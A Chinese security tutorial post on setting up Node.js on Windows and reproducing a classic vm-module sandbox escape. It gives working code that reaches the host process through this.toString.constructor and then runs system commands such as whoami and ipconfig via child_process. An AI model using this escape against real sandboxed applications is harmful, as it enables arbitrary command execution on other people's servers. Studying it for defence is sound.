安全杂记 - 复现nodejs沙箱绕过

目录

一. 配置环境

1.下载nodejs

bash 复制代码
官网:https://nodejs.org/en

2.nodejs配置

安装nodejs的msi文件,默认配置一直下一步即可,以下步骤以默认安装为准,如有安装位置改变,请自行更改环境变量里面的配置。

继续进行环境变量的配置

用户变量如下

系统变量如下

编辑PATH添加如下

在默认安装位置新建如下两个文件

node_cache是放安装过程的缓存文件

node_global是存放安装模块配置位置

测试是否安装成功

继续执行如下命令

bash 复制代码
npm config set prefix "C:\Program Files\nodejs\node_global"
npm config set cache "C:\Program Files\nodejs\node_cache"

安装cluster进行测试

bash 复制代码
npm install cluster -g

3.报错解决方法

如有报错请尝试给nodejs默认安装目录提升用户权限来解决。

二. nodej沙箱绕过

1. vm模块

javascript 复制代码
const vm = require('vm');
const script = `m + n`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

运行结果

2.使用this或引用类型来进行沙箱绕过

this指向的是sandbox,我们可以获得一个tosString方法,通过toString方法来获得一个构造函数。

所有函数都是由Fuction创造出来的,我们的目的是拿到process模块

因为constructor本身指向它的构造函数,所以我们可以利用constructor函数,来拿到Function函数

沙盒逃逸就是要把外面的元素或者对象引入进来。

如下,此时是利用this

javascript 复制代码
const vm = require('vm');
const script = `
const process = x.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;

const sandbox = { m: [], n: {}, x:/regexp/};
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

我们把"x"替换为this也是可以成功执行的,此时m和n可以是任意.,这个是利用了引用类型比如{}。

javascript 复制代码
const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('ipconfig').toString()
`;

const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

whoami成功执行,代表着此时已经可以任意命令执行

用户learnpc是我的管理员用户

比如我们这里在执行以下ipconfig来进行验证

以上便是经典的沙箱逃逸来执行命令,当我们可以执行命令的时候,便说明我们其实已经成功拿下。此时也可执行其他不好的命令。

相关推荐
weixin_4723394626 分钟前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
sam.li27 分钟前
WebView安全实现(一)
android·安全·webview
weixin_4723394629 分钟前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
诗句藏于尽头8 小时前
完成ssl不安全警告
网络协议·安全·ssl
独行soc13 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Me4神秘14 小时前
Linux国产与国外进度对垒
linux·服务器·安全
老K(郭云开)14 小时前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全
Whoisshutiao15 小时前
网安-XSS-pikachu
前端·安全·网络安全
还是奇怪16 小时前
Linux - 安全排查 2
linux·运维·安全
Clownseven21 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全